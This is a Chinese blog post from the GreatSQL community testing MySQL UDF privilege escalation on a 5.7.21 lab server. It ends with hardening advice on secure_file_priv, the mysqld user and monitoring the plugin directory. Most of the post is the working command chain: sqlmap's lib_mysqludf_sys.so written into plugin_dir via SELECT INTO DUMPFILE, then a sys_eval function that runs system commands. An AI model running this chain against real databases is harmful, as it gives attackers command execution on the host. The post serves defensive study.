MySQL UDF 提权初探

于 2024-08-07 10:09:01 发布
阅读量192 收藏 2
点赞数 3
文章标签: GreatSQL MySQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GreatSQL2021/article/details/140981139
版权

MySQL UDF 提权初探

对 MySQL UDF 提权做一次探究,什么情况下可以提权,提取的主机权限是否跟mysqld进程启动的主机账号有关

数据库信息

MySQL数据库版本:5.7.21

UDF

UDF:(User Defined Function) 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行提权。

提权原理:攻击者通过编写调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,创建一个指向共享库文件的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。

执行过程:本质上还是利用了MySQL能够执行系统命令的特点。具体过程如下

(1)攻击者编写一些可以调用cmd或者shell的共享库文件(window为.dll,linux为.so),将共享库导入指定的函数目录中。

(2)在MySQL中创建指向共享库文件的自定义函数。

(3)通过刚刚创建的函数执行系统命令,实现提权。

漏洞详情

当mysql配置secure_file_priv项为空或者secure_file_priv项为plugin文件夹,且可以用弱口令登录数据库,存在udf提权漏洞。

  1. 查看漏洞利用条件:secure_file_priv为空或者为plugin文件夹,可以登录数据库,存在plugin文件夹

  2. 将udf.so文件导入相关plugin文件夹下

  3. 使用udf创建自定义函数 Create function sys_eval returns string soname ‘udf.so’;

  4. 使用自定义函数执行任意代码执行:

获取so文件

$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
python3 cloak.py -d -i /tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so_

$ ll /tmp/sqlmap-dev/data/udf/mysql/linux/64/
-rw-rw-r-- 1 mysql mysql 8040 May 21 15:17 lib_mysqludf_sys.so
-rw-rw-r-- 1 mysql mysql 3200 May 21 15:17 lib_mysqludf_sys.so_

root账号拉起mysqld进程

secure_file_priv=''

mysql> show variables like '%secure_file_priv%';
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv |                |
+------------------+----------------+
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+
| default_authentication_plugin | mysql_native_password              |
| plugin_dir                    | /mysql/svr/mysql5721/lib/plugin/   |
+-------------------------------+------------------------------------+
#导入so文件成功
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)

mysql> insert into foo values(load_file('/tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.01 sec)
#导出so文件到plugin_dir下成功
mysql> select * from foo into dumpfile '/mysql/svr/mysql5721/lib/plugin/lib_mysqludf_sys.so';
Query OK, 1 row affected (0.01 sec)
#创建自定义函数成功
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
Query OK, 0 rows affected (0.00 sec)
#调用函数成功
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| root               |
+--------------------+
1 row in set (0.02 sec)

mysql> show variables like '%secure_file_priv%';
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv | /home/mysql/   |
+------------------+----------------+
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+
| default_authentication_plugin | mysql_native_password              |
| plugin_dir                    | /mysql/svr/mysql5721/lib/plugin/   |
+-------------------------------+------------------------------------+
#创建中间表
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)
#导入so文件成功
mysql> insert into foo values(load_file('/tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.01 sec)
#导出so文件到plugin_dir下失败
mysql> select * from foo into dumpfile '/mysql/svr/mysql5721/lib/plugin/lib_mysqludf_sys.so';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
#导出so文件到secure_file_priv
mysql> select * from foo into dumpfile '/home/mysql/lib_mysqludf_sys.so';
Query OK, 1 row affected (0.00 sec)
#通过plugin的so创建自定义函数失败
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys.so' (errno: 0 /mysql/svr/mysql-5.7.21-linux-glibc2.12-x86_64/lib/plugin/lib_mysqludf_sys.so: cannot open shared object file: No such file or)

secure_file_priv=dirname(secure_file_priv和plugin_dir路径一致)

#plugin_dir路径下有so文件了
#直接创建自定义函数
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
Query OK, 0 rows affected (0.00 sec)
#调用函数成功
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| root               |
+--------------------+
1 row in set (0.02 sec)

secure_file_priv=null

mysql> show variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | null  |
+------------------+-------+
1 row in set (0.01 sec)
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+
| default_authentication_plugin | mysql_native_password              |
| plugin_dir                    | /mysql/svr/mysql5721/lib/plugin/   |
+-------------------------------+------------------------------------+
#创建中间表
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)
#导入so文件成功
mysql> insert into foo values(load_file('/tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.01 sec)
#导出so文件到plugin_dir下失败
mysql> select * from foo into dumpfile '/mysql/svr/mysql5721/lib/plugin/lib_mysqludf_sys.so';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
#通过plugin的so创建自定义函数失败
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys.so' (errno: 0 /mysql/svr/mysql-5.7.21-linux-glibc2.12-x86_64/lib/plugin/lib_mysqludf_sys.so: cannot open shared object file: No such file or)

普通账号拉起mysqld进程

secure_file_priv=''

mysql> show variables like '%secure_file_priv%';
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv |                |
+------------------+----------------+
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+
| default_authentication_plugin | mysql_native_password              |
| plugin_dir                    | /mysql/svr/mysql5721/lib/plugin/   |
+-------------------------------+------------------------------------+
#导入so文件成功
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)

mysql> insert into foo values(load_file('/tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.01 sec)
#导出so文件到plugin_dir下成功
mysql> select * from foo into dumpfile '/mysql/svr/mysql5721/lib/plugin/lib_mysqludf_sys.so';
Query OK, 1 row affected (0.01 sec)
#创建自定义函数成功
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
Query OK, 0 rows affected (0.00 sec)
#调用函数成功
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql              |
+--------------------+
1 row in set (0.06 sec)

余下的几种secure_file_priv=dirname(secure_file_priv和plugin_dir路径不一致),secure_file_priv=dirname(secure_file_priv和plugin_dir路径一致),secure_file_priv=null得出的结果是类似的,这里就不详细继续阐述了,全部写完可能篇数稍长。

总结

  • secure_file_priv

    • ''(empty string),不限制导入和导出的目录。只需将so写到plugin_dir,能创建so自定义函数。存在漏洞风险
    • dirname(指定目录),限制导入和导出为指定目录。如果指定的目录和plugin_dir相同,能正常创建so自定义函数,存在漏洞风险;否则不能创建so自定义函数
    • null,禁止导入和导出操作,不存在漏洞风险

  • 提权账号 无论采用哪种方式启动数据库(systemctl start mysql、mysqld、mysqld_safe),提权后的账号根据mysqld进程uid确定

    $ ps -ef|head -1;ps -ef |grep 5721
UID        PID  PPID  C STIME TTY          TIME CMD
root     18371 11890  1 17:33 pts/21   00:00:00 /mysql/svr/mysql5721/bin/mysqld --defaults-file=/mysql/conf/mysql5721.cnf

  • 数据库账号的权限 目标端需要能执行select...into dumpfile、创建函数权限

    建议

  1. 使用普通账号启动数据库(配置文件中--user=mysql)
  2. secure_file_priv设置为null,禁止导入和导出操作;如果需要导入和导出,将secure_file_priv设置为非plugin_dir目录
  3. 数据库密码尽量复杂
  4. 关注plugin_dir是否有新增的不明来源的.so文件和关注数据库是否有新增不明来源的自定义函数

Enjoy GreatSQL :)

关于 GreatSQL

GreatSQL是适用于金融级应用的国内自主开源数据库,具备高性能、高可靠、高易用性、高安全等多个核心特性,可以作为MySQL或Percona Server的可选替换,用于线上生产环境,且完全免费并兼容MySQL或Percona Server。

相关链接: GreatSQL社区 Gitee GitHub Bilibili

GreatSQL社区:

image

社区有奖建议反馈: https://greatsql.cn/thread-54-1-1.html

社区博客有奖征稿详情: https://greatsql.cn/thread-100-1-1.html

(对文章有疑问或者有独到见解都可以去社区官网提出或分享哦~)

技术交流群:

微信&QQ群:

QQ群:533341697

微信群:添加GreatSQL社区助手(微信号:wanlidbc )好友,待社区助手拉您进群。

GreatSQL社区
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大数据学习指南从入门到精通
Lansonli(蓝深李)的博客
05-21 2万+
利用框架的力量,看懂游戏规则,才是入行的前提大多数人不懂,不会,不做,才是你的机会,你得行动,不能畏首畏尾选择才是拉差距关键,风向,比你流的汗水重要一万倍,逆风划船要累死人的为什么选择学习大数据开发,不选择Java开发?借棋弈做比喻,智商高的不要选择五子琪,要选择围棋,它能长久地吸引你。不都是在棋盘上一颗黑子一颗白子地下吗?因为围棋更复杂,能够掌握如此复杂的技艺、产生稳定输出的棋手、让我们更佩服。选择学习大数据开发也如此,能让你的职业生涯走得更远,少走弯路。
MySQL 聚合函数初探
GreatSQL2021的博客
11-12 522
GreatSQL社区原创内容未经授权不得随意使用,转载请联系小编并注明来源。 GreatSQLMySQL的国产分支版本,使用上与MySQL一致。 作者:Q MySQL 提供了许多聚合函数,常见的如sum,avg,count,min,max等。 那这些聚合函数在MySQL 底层是怎么实现的? 聚合函数(Aggregate Function)实现的大部分代码在item_sum.h和item_sum.cc。 聚合函数在代码中具体的枚举如下: enum Sumfunctype { COUNT_FUN
mysql中,information_schema初探
凡江林的博客
10-18 2306
1. 问题描述 在java开发中,与数据库打交道是家常便饭。JDBC技术、基于JDBC封装的工具类库、基于JDBC封装的框架是目前java操作数据库的几种主要方式。比较常见的基于JDBC封装的工具类库有: Apache组织提供的Commons DbUtils,使用它能够简化JDBC应用程序的开发,并且,与原生的JDBC操作在性能上相差无异。 Spring框架中提供的SpringJDBC,该工具类库封装了基础的JDBC操作,我们在使用时,不用去关注获取驱动、建立连接、关闭连接等非业务操作,可以更加专注于业务
初探MySQL的语句之二
radish-
11-27 101
1VIEW 视图 视图:虚拟表,保存有实表的查询结果 1.1 创建视图 创建方法 CREATE VIEW view_name [(column_list)] AS select_statement [WITH [CASCADED | LOCAL] CHECK OPTION]
MySQL 8.0.30 的数据加密有哪些变化?
老叶茶馆
10-26 703
MySQL 8.0.30于2022年7月26日正式发行。在这个版本里,除了为数据加密功能增加了KDF(Key Derivation Function),还为企业版发布了新的加密组件,以替代之前基于OpenSSL的UDF。KDFMySQL具有SQL级别的加密功能,社区版的MySQL提供了AES_DECRYPT(),AES_ENCRYPT()函数用于数据的加密和解密,函数使用AES(Advanced ...
MySQL binlog模式及主备的基本原理
若明天不见
08-25 683
MySQL binlog是二进制格式的日志文件,用于记录MySQL内部对数据库的修改操作,主要作用为数据库的主从复制及增量恢复STATEMENT,ROW,MIXEDMySQL 5.0版本前,因为binlog模式只有statement,为了避免主从复制不一致,只能使用RR隔离模式配合。MySQL 5.1+ 可以使用RC + Row进行binlog主从复制,在绝大多数情况无需加间隙锁,以提获得更好的并发性,且可保证主从复制一致性Oracle及sqlserver默认使用RC隔离级别。...
第1章 初探大数据
weixin_38492276的博客
08-25 585
1、1导学 功能实现 统计imooc(慕课网)主站最受欢迎的课程/手记的Top N访问次数 按地市统计imooc主站最受欢迎的Top N课程 按流量统计imocc主站最受欢迎的Top N课程 大数据的到来 任职要求 .熟悉Linux操作系统,熟悉Linux shell 编程 .熟悉Java或者scala语言,具有一年以上实际开发经验 .熟悉spark sql 或 ...
初探大数据-hive架构分析-实战五
lenostalhj的博客
03-05 666
官网地址hive.apache.org架构解析:一、Hive底层的执行引擎有:MapReduce、Tez、Spark    Hive on MapReduce    Hive on Tez    Hive on Spark压缩:GZIP、LZO、Snappy、BZIP2..存储:TextFile、SequenceFile、RCFile、ORC、ParquetUDF:自定义函数二、Hive环境搭建1...
云原生消息、事件、流超融合平台——RocketMQ 5.0 初探
阿里云开发者
10-12 328
简介:今天分享的主题是云原生消息事件流超融合平台 RocketMQ 5.0 初探,内容主要分为三个部分: 首先,带大家回顾业务消息领域首选 RocketMQ 4 发展历史以及 4.x 版本的演进与发展。 其次,会为大家详细介绍 RocketMQ 5.0 发展情况以及一些新特性。 最后,会为大家介绍 RocketMQ 5.0 的发展路线图,方便社区小伙伴能够一起参与进来到 5.0 的贡献中来。前言:本文整理自 RocketMQ x EventMesh OpenDay 金融通演讲内容作者 | 金
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
mysql提权udf
09-20
在网络安全领域,"mysql提权udf"常常指的是利用UDF进行权限提升的技巧,这对于渗透测试和系统安全评估至关重要。 MySQL提权通常涉及以下步骤: 1. **UDF编译与注入**:首先,你需要编写或找到一个能够执行系统命令...
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
MYSQL高版本低版本UDF提权工具
06-20
描述中的“有两个版本”可能指的是为不同MySQL版本设计的两种UDF提权工具。 在进行UDF提权时,安全专家通常会遵循以下步骤: 1. 分析目标MySQL版本的特性和已知漏洞。 2. 设计或寻找适合的UDF库,该库能够执行提权...
[毕业设计]VB Access就业指导与失业保险发放系统(源代码+论文撰写+答辩演示文稿).zip
最新发布
08-07
[毕业设计]VB Access就业指导与失业保险发放系统(源代码+论文撰写+答辩演示文稿)
微信开发资源ddddddd
08-07
微信开发资源ddddddd
springboot536外卖点餐系统.zip
08-07
从用户的功能要求出发,建立了外卖点餐系统 ,系统中的功能模块主要是实现管理员;首页、个人中心、用户管理、商家管理、菜品分类管理、骑手管理、系统管理、菜品管理、订单管理、配送单管理、商品评价管理,商家;首页、个人中心、菜品管理、订单管理、配送单管理、商品评价管理、我的收藏管理,用户;首页、个人中心、订单管理、配送单管理、商品评价管理、我的收藏管理、骑手;首页、个人中心、订单管理、配送单管理、商品评价管理等功能部分;经过认真细致的研究,精心准备和规划,最后测试成功,系统可以正常使用。分析功能调整与外卖点餐系统实现的实际需求相结合,讨论了JSP开发外卖点餐系统的使用。
19届智能车负压镜头代码适用于mini车全元素
08-07
调试好后可达2.8m/s祝愿道友好运
mysql udf 提权
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高权限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低权限账户调用该函数,从而实现提权操作。 需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授权的情况下进行。滥用提权功能可能导致系统被攻击或数据泄露等安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值